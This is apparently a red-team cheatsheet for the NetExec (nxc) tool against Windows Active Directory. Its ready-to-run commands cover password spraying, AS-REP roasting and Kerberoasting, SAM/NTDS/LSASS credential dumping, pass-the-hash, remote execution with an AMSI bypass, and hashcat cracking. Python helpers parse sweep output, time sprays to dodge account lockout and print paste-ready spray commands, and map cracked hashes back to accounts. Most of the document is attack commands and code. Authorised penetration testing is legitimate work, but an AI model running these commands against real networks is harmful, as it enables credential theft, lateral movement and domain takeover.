Methodology Checklist
Operational Context
Use when: quick nxc command reference: match protocol, action, and flag to the task at hand.
Think Dumber First: Syntax: nxc [PROTOCOL] [TARGET] -u [USER] -p [PASS] [ACTION]. Protocol: smb/ldap/winrm/rdp/mssql/ssh. Always test the credential with a plain login before running actions or modules: nxc smb [TARGET] -u [USER] -p [PASS]. A green [+] means the login worked; (Pwn3d!) after it means the account has admin rights on that host, which is what -x/-X, --sam, --lsa, --ntds and the lsassy module require. No Pwn3d! means enumeration only.
Skip when: N/A (reference document).
Tactical Cheatsheet
Command                                                               Tactical Outcome
nxc smb [NETWORK]/[MASK]                                              Subnet sweep: OS, hostname, domain, SMB signing, SMBv1
nxc smb [NETWORK]/[MASK] --gen-relay-list relay.txt                   Write hosts with signing:False (NTLM relay targets) to relay.txt
nxc smb [DC_IP] -u '' -p '' --pass-pol                                Password policy: lockout threshold and reset window (check before spraying!)
nxc smb [DC_IP] -u '' -p '' --users                                   User enumeration via NULL session
nxc smb [DC_IP] -u [USER_FILE] -p '[PASS]' --continue-on-success      Password spray: one password against every user in the file
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --asreproast asrep.txt         AS-REP roast every account with Kerberos pre-auth disabled
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txt       Kerberoast every account with an SPN
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password                   GPP credential extraction (cpassword in SYSVOL)
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps                        LAPS password extraction (account must have read rights on the LAPS attribute)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --sam                         Dump local SAM hashes (needs Pwn3d!)
nxc smb [DC_IP] -u [USER] -p [PASS] --ntds                            Dump NTDS.dit, all domain hashes (needs admin on the DC)
nxc smb [TARGET_IP] -u [USER] -p [PASS] --lsa                         LSA secrets + cached domain creds (DCC2) (needs Pwn3d!)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -M lsassy                     LSASS dump: creds of live logon sessions (needs Pwn3d!)
nxc [PROTO] [TARGET_IP] -u [USER] -H [NTLM_HASH]                      Pass-the-Hash (smb, winrm, ldap, mssql, rdp)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -x "[CMD]"                    Remote CMD execution (needs Pwn3d!)
nxc smb [TARGET_IP] -u [USER] -p [PASS] -X "[PS]"                     Remote PowerShell; nxc's wrapper includes an AMSI bypass, --amsi-bypass FILE supplies your own (needs Pwn3d!)
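The sweep and login lines nxc prints are what you triage before choosing the next row of the table above. The script below is an added example, not NetExec code: it parses a saved sweep (banner lines with OS, domain, signing, plus the per-host login result) into the three lists a tester acts on, relay targets (signing:False, the same set --gen-relay-list writes), hosts where the account is admin (Pwn3d!), and SMBv1 hosts. The sample output is constructed to mirror nxc's line layout; the IPs, hostnames and credential are made up.

```python
"""Triage a saved `nxc smb SUBNET/24 -u USER -p PASS | tee sweep.txt` run.

Added example, not part of NetExec. Parses nxc's banner lines ([*] OS/name/
domain/signing/SMBv1) and login-result lines ([+]/[-] ... (Pwn3d!)) into one
record per host, then derives the relay-target, Pwn3d! and SMBv1 lists.
SAMPLE_SWEEP is constructed to match nxc's column layout; all values are made up.
"""
import re
import sys
from collections import defaultdict

SAMPLE_SWEEP = """\
SMB         10.10.10.5      445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.10.10.20     445    WS01             [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.10.10.30     445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.10.10.5      445    DC01             [+] corp.local\\jdoe:Winter2024!
SMB         10.10.10.20     445    WS01             [+] corp.local\\jdoe:Winter2024! (Pwn3d!)
SMB         10.10.10.30     445    FS01             [-] corp.local\\jdoe:Winter2024! STATUS_LOGON_FAILURE
"""

# Banner line: "[*] <OS string> (name:X) (domain:Y) (signing:True|False) (SMBv1:True|False)"
BANNER_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\d+\s+\S+\s+\[\*\]\s+(?P<os>.*?)\s+"
    r"\(name:(?P<name>[^)]*)\)\s+\(domain:(?P<domain>[^)]*)\)\s+"
    r"\(signing:(?P<signing>True|False)\)\s+\(SMBv1:(?P<smbv1>True|False)\)"
)
# Login line: "[+] domain\user:pass (Pwn3d!)" on success, "[-] domain\user:pass STATUS_..." on failure
LOGIN_RE = re.compile(
    r"^SMB\s+(?P<ip>\d+\.\d+\.\d+\.\d+)\s+\d+\s+\S+\s+\[(?P<mark>[+-])\]\s+"
    r"(?P<cred>\S+)(?P<rest>.*)$"
)


def parse_sweep(text):
    """Return {ip: record}, merging the banner and login lines of each host."""
    hosts = defaultdict(lambda: {"name": None, "domain": None, "os": None,
                                 "signing": None, "smbv1": None,
                                 "login": None, "admin": False})
    for line in text.splitlines():
        m = BANNER_RE.match(line)
        if m:
            hosts[m["ip"]].update(name=m["name"], domain=m["domain"], os=m["os"],
                                  signing=m["signing"] == "True",
                                  smbv1=m["smbv1"] == "True")
            continue
        m = LOGIN_RE.match(line)
        if m:
            rec = hosts[m["ip"]]
            rec["login"] = "ok" if m["mark"] == "+" else "failed"
            rec["admin"] = "(Pwn3d!)" in m["rest"]
    return dict(hosts)


def relay_targets(hosts):
    """Hosts that do not require SMB signing: ntlmrelayx candidates."""
    return sorted(ip for ip, h in hosts.items() if h["signing"] is False)


def pwned_hosts(hosts):
    """Hosts where the tested account is admin: -x/-X, --sam, --lsa, lsassy are all available."""
    return sorted(ip for ip, h in hosts.items() if h["admin"])


def smbv1_hosts(hosts):
    """Hosts still answering SMBv1: worth a separate finding on its own."""
    return sorted(ip for ip, h in hosts.items() if h["smbv1"])


if __name__ == "__main__":
    # Pass a captured sweep file as argv[1]; otherwise the constructed sample is used.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_SWEEP
    hosts = parse_sweep(text)
    print("relay targets :", relay_targets(hosts))
    print("Pwn3d! hosts  :", pwned_hosts(hosts))
    print("SMBv1 enabled :", smbv1_hosts(hosts))
```

Run it as `nxc smb 10.10.10.0/24 -u jdoe -p 'Winter2024!' | tee sweep.txt; python3 triage.py sweep.txt` (file name assumed). A host that logs in without Pwn3d! (DC01 in the sample) is enumeration-only; spend the admin hosts first.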
Deep Dive & Workflow
Engagement Workflow: NetExec Phases
Phase 0: Setup
pipx install netexec
nxcdb → workspace create [ENGAGEMENT] (typed inside the nxcdb shell; later nxc runs log hosts and creds into this workspace)
Phase 1: Recon
nxc smb [SUBNET]/24 → discover hosts, OS, domain, signing
nxc smb [SUBNET]/24 --gen-relay-list relay.txt → hosts with signing:False (relay targets)
Phase 2: Anonymous Enum
nxc smb [DC_IP] -u '' -p '' --pass-pol → FIRST: lockout threshold and reset window
nxc smb [DC_IP] -u '' -p '' --users → user list (if NULL sessions are refused, retry with -u 'guest' -p '')
nxc smb [DC_IP] -u '' -p '' --shares → accessible shares
Phase 3: Credential Attacks
nxc smb [DC_IP] -u users.txt -p 'Corp2024!' --continue-on-success → spray one password across all users (stay below the lockout threshold per reset window)
nxc ldap [DC_FQDN] -u users.txt -p '' --asreproast asrep.txt → AS-REP roast accounts without pre-auth (no valid credential needed)
nxc smb [DC_IP] -u [USER] -p [PASS] -M gpp_password → GPP creds from SYSVOL
Phase 4: Authenticated Enum
nxc ldap [DC_FQDN] -u [USER] -p [PASS] --kerberoasting kerb.txt → Kerberoast SPN accounts
nxc ldap [DC_FQDN] -u [USER] -p [PASS] -M laps → LAPS passwords (only those the account may read)
nxc smb [TARGET] -u [USER] -p [PASS] -M spider_plus → crawl readable shares and list files (-o DOWNLOAD_FLAG=True to fetch them)
Phase 5: Post-Exploitation (each needs Pwn3d! on the target)
nxc smb [TARGET] -u [USER] -p [PASS] --sam → local hashes
nxc smb [DC_IP] -u [ADMIN] -p [PASS] --ntds → domain hashes (admin on the DC)
nxc smb [TARGET] -u [USER] -p [PASS] -M lsassy → creds of live logon sessions
Phase 6: Lateral Movement
nxc smb [SUBNET]/24 -u [USER] -H [HASH] --local-auth → spray a local admin hash across the subnet; Pwn3d! marks password reuse
nxc winrm [TARGET] -u [USER] -H [HASH] → WinRM pass-the-hash
nxcdb → export creds detailed loot.csv → document every credential collected
Critical Rules
Rule                                                 Why
Check --pass-pol before spraying                     Avoid domain-wide lockout: size each spray batch to the lockout threshold and wait out the reset window between batches
Use FQDN (not IP) for LDAP/Kerberos                  Kerberos tickets are requested for a service principal built from the hostname; an IP does not resolve to one
--local-auth for non-domain accounts                 Otherwise nxc sends the login to the domain and the local account's credential is rejected (STATUS_LOGON_FAILURE)
(Pwn3d!) required for -x, -X, --sam, --lsa, --ntds   Without admin rights the service-control and registry access these need is denied
Add DC FQDN to /etc/hosts                            Required for Kerberos ticket ops (-k, --use-kcache) when the DC is not resolvable through DNS
Delete the workspace smb.db if nxc acts buggy        Clears a corrupt database (~/.nxc/workspaces/[WORKSPACE]/smb.db); the hosts and creds recorded there are lost, so export first
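The first rule above ("check --pass-pol before spraying") is the one most often skipped. As an added example, not NetExec code, the script below reads the lockout threshold and the lockout-counter reset window out of a --pass-pol dump, computes how many passwords can be tried per user inside one window, and emits the nxc spray lines with the required pause between batches. The policy text is constructed to mirror the layout of nxc's --pass-pol output; the values, DC address and passwords are made up, and the two-attempt safety margin is a heuristic, not a policy field.

```python
"""Size a password spray from `nxc smb DC -u '' -p '' --pass-pol` output.

Added example, not part of NetExec. Reads "Account Lockout Threshold" and
"Reset Account Lockout Counter" from the policy dump and turns them into a
batch size and a wait time for a spray. SAMPLE_PASS_POL is constructed to
match nxc's output layout; the numbers are made up.
"""
import re
import shlex

SAMPLE_PASS_POL = """\
SMB         10.10.10.5      445    DC01             [+] Dumping password info for domain: CORP
SMB         10.10.10.5      445    DC01             Minimum password length: 7
SMB         10.10.10.5      445    DC01             Password history length: 24
SMB         10.10.10.5      445    DC01             Maximum password age: 41 days 23 hours 53 minutes
SMB         10.10.10.5      445    DC01             Password Complexity Flags: 000001
SMB         10.10.10.5      445    DC01             Minimum password age: 1 day 4 minutes
SMB         10.10.10.5      445    DC01             Reset Account Lockout Counter: 30 minutes
SMB         10.10.10.5      445    DC01             Locked Account Duration: 30 minutes
SMB         10.10.10.5      445    DC01             Account Lockout Threshold: 5
SMB         10.10.10.5      445    DC01             Forced Log off Time: Not Set
"""

# Heuristic margin: leaves room for a user's own typos and for other testers hitting the same accounts.
SAFETY_MARGIN = 2


def _minutes(text):
    """'1 day 4 minutes' or '30 minutes' -> total minutes; None for 'Not Set' or other non-durations."""
    total, found = 0, False
    for num, unit in re.findall(r"(\d+)\s*(day|hour|minute)", text):
        found = True
        total += int(num) * {"day": 1440, "hour": 60, "minute": 1}[unit]
    return total if found else None


def parse_pass_pol(text):
    """Extract the three fields a spray depends on. threshold None/0 means lockout is disabled."""
    policy = {"threshold": None, "reset_minutes": None, "lockout_minutes": None}
    for line in text.splitlines():
        m = re.search(r"Account Lockout Threshold:\s*(\S+)", line)
        if m:
            policy["threshold"] = None if m.group(1) in ("None", "0") else int(m.group(1))
        m = re.search(r"Reset Account Lockout Counter:\s*(.*)$", line)
        if m:
            policy["reset_minutes"] = _minutes(m.group(1))
        m = re.search(r"Locked Account Duration:\s*(.*)$", line)
        if m:
            policy["lockout_minutes"] = _minutes(m.group(1))
    return policy


def spray_plan(policy, n_passwords):
    """Passwords per user per reset window, number of windows needed, and the wait between them."""
    threshold = policy["threshold"]
    if not threshold:                               # no lockout policy: spray the whole list
        return {"per_window": n_passwords, "windows": 1, "wait_minutes": 0}
    per_window = max(threshold - SAFETY_MARGIN, 1)
    windows = -(-n_passwords // per_window)         # ceiling division
    return {"per_window": per_window, "windows": windows,
            "wait_minutes": policy["reset_minutes"] or 0}


def spray_commands(dc_ip, users_file, passwords, policy):
    """One nxc line per password, with a sleep inserted whenever a new lockout-counter window is needed."""
    plan = spray_plan(policy, len(passwords))
    lines = []
    for i, pw in enumerate(passwords):
        if i and i % plan["per_window"] == 0:
            lines.append(f"sleep {plan['wait_minutes'] * 60 + 60}   # next lockout-counter window (+1 min slack)")
        lines.append(f"nxc smb {dc_ip} -u {users_file} -p {shlex.quote(pw)} --continue-on-success")
    return lines


if __name__ == "__main__":
    pol = parse_pass_pol(SAMPLE_PASS_POL)
    print("policy:", pol)
    print("plan  :", spray_plan(pol, 5))
    for cmd in spray_commands("10.10.10.5", "users.txt",
                              ["Corp2024!", "Winter2024!", "Spring2025!", "Summer2025!", "Welcome1"], pol):
        print(cmd)
```

With threshold 5 and a 30-minute reset window, the sample yields three passwords per batch and a 31-minute pause before the fourth; the emitted lines can be pasted into a shell as-is. If --pass-pol reports the threshold as None, the function returns the whole list in one batch, which is exactly the case where a tester should still think about detection rather than lockout.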
Hash Cracking Quick Reference
# ASREPRoast (hashcat mode 18200)
hashcat -a 0 -m 18200 asrep.txt rockyou.txt
# Kerberoast (hashcat mode 13100)
hashcat -a 0 -m 13100 kerb.txt rockyou.txt
# NTLM (hashcat mode 1000) from SAM/NTDS; mode 1000 takes the NT hash only,
# so cut the 4th field out of the user:rid:LM:NT::: lines nxc prints first
cut -d: -f4 sam_or_ntds.txt | sort -u > ntlm.txt
hashcat -a 0 -m 1000 ntlm.txt rockyou.txt
# NetNTLMv2 (hashcat mode 5600) β from Responder
hashcat -a 0 -m 5600 netntlmv2.txt rockyou.txt
# DCC2/mscache2 (hashcat mode 2100) β from LSA
hashcat -a 0 -m 2100 dcc2.txt rockyou.txt
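The NTLM step above hides two chores: extracting unique NT hashes from the pwdump lines nxc prints, and mapping hashcat's cracks back to the accounts (and hosts) they belong to. The script below is an added example, not NetExec code, that does both and also reports hash reuse across hosts, which is a finding on its own before any cracking happens. The dump lines and potfile are constructed; the two NT values that matter are the well-known hashes of an empty password and of "password", everything else is made up.

```python
"""From `nxc smb ... --sam/--ntds` output to hashcat -m 1000 input and back.

Added example, not part of NetExec. nxc prints dumped hashes in pwdump format
(user:rid:LM:NT:::) behind its usual SMB/ip/port/host prefix. This extracts the
unique NT hashes (what -m 1000 expects), flags accounts that share a hash, and
joins hashcat's potfile (nt:plaintext) back to host\\user. Samples are constructed.
"""
import re
from collections import defaultdict

PWDUMP_RE = re.compile(
    r"(?P<user>[^\s:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::"
)

# Constructed: two --sam runs concatenated. 8846f7... is NT("password"), 31d6cf... is NT("").
SAMPLE_DUMP = """\
SMB         10.10.10.20     445    WS01             [+] Dumping SAM hashes
SMB         10.10.10.20     445    WS01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB         10.10.10.20     445    WS01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.20     445    WS01             helpdesk:1001:aad3b435b51404eeaad3b435b51404ee:5e3a8fa6f1c3d4b2a9c0e7d8f1a2b3c4:::
SMB         10.10.10.30     445    FS01             [+] Dumping SAM hashes
SMB         10.10.10.30     445    FS01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB         10.10.10.30     445    FS01             svc_backup:1002:aad3b435b51404eeaad3b435b51404ee:0f1e2d3c4b5a69788796a5b4c3d2e1f0:::
"""

# Constructed hashcat potfile (hash:plain) after `hashcat -m 1000 ntlm.txt rockyou.txt`.
SAMPLE_POTFILE = """\
8846f7eaee8fb117ad06bdd830b7586c:password
31d6cfe0d16ae931b73c59d7e0c089c0:
"""


def parse_dump(text):
    """Return [(host, user, rid, nt)] from console or log lines; host is the IP column, '-' if absent."""
    rows = []
    for line in text.splitlines():
        m = PWDUMP_RE.search(line)
        if not m:
            continue                                   # banner / status lines carry no hash
        host_m = re.match(r"^\S+\s+(\d+\.\d+\.\d+\.\d+)", line)
        host = host_m.group(1) if host_m else "-"
        rows.append((host, m["user"], int(m["rid"]), m["nt"].lower()))
    return rows


def hashcat_input(rows):
    """Unique NT hashes, one per line: the file to feed hashcat -m 1000."""
    return sorted({nt for _, _, _, nt in rows})


def reuse_report(rows):
    """NT hash -> accounts (host\\user) sharing it; only hashes held by more than one account."""
    by_hash = defaultdict(list)
    for host, user, _, nt in rows:
        by_hash[nt].append(f"{host}\\{user}")
    return {nt: accts for nt, accts in by_hash.items() if len(accts) > 1}


def parse_potfile(text):
    """hashcat potfile lines are hash:plaintext; an empty plaintext is a blank password."""
    cracked = {}
    for line in text.splitlines():
        if ":" in line:
            nt, plain = line.split(":", 1)
            cracked[nt.lower()] = plain
    return cracked


def join_cracked(rows, cracked):
    """host\\user -> plaintext for every account whose NT hash appears in the potfile."""
    return {f"{host}\\{user}": cracked[nt] for host, user, _, nt in rows if nt in cracked}


if __name__ == "__main__":
    rows = parse_dump(SAMPLE_DUMP)
    print("\n".join(hashcat_input(rows)))              # contents for ntlm.txt
    for nt, accts in reuse_report(rows).items():
        print(f"reuse {nt}: {', '.join(accts)}")        # same local admin hash on two hosts
    for acct, plain in join_cracked(rows, parse_potfile(SAMPLE_POTFILE)).items():
        print(f"{acct} -> {plain!r}")
```

The reuse report is worth reading before hashcat finishes: an identical Administrator NT hash on two hosts means the hash itself moves laterally with -H, cracked or not.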
Protocol Quick-Access
# SMB
nxc smb [TARGET] -u [USER] -p [PASS]
# WinRM (PowerShell remoting)
nxc winrm [TARGET] -u [USER] -p [PASS]
# RDP check
nxc rdp [TARGET] --nla-screenshot
# LDAP (use FQDN)
nxc ldap [DC_FQDN] -u [USER] -p [PASS]
# MSSQL
nxc mssql [TARGET] -u [USER] -p [PASS] -d [DOMAIN]
nxc mssql [TARGET] -u [USER] -p [PASS] --local-auth
# SSH
nxc ssh [TARGET] -u [USER] -p [PASS]
Troubleshooting & Edge Cases
Problem                            Cause                        Fix
Wrong protocol for target          Protocol selection unclear   Try each in turn: smb → winrm → rdp → ssh; nxc reports per protocol whether the port answers and whether the credential is accepted
Module not found                   Wrong module name            List modules: nxc smb -L (SMB modules), nxc ldap -L (LDAP modules)
nxc vs crackmapexec confusion      Legacy name                  nxc (NetExec) is the maintained continuation of CrackMapExec (cme) with the same syntax; use nxc
Authentication fails               Wrong format                 Domain accounts: -d DOMAIN -u user; local accounts: -u user --local-auth (local creds sent to the domain fail with STATUS_LOGON_FAILURE)
Module requires elevated access    Not admin                    --sam, --lsa, --ntds and lsassy need admin rights; confirm (Pwn3d!) on a plain login before running them
Reporting Trigger
Finding Title: NetExec Multi-Protocol Attack Surface Coverage
Impact: nxc provides single-tool coverage of SMB, LDAP, WinRM, RDP, MSSQL and SSH, enabling rapid credential testing and post-exploitation across the common Windows management protocols with consistent syntax and result tracking in nxcdb.
Root Cause: N/A β operational tool reference.
Recommendation: Security teams should run nxc against their own environments during red team exercises to identify credential reuse and misconfigured services before attackers do. nxc output provides actionable remediation targets.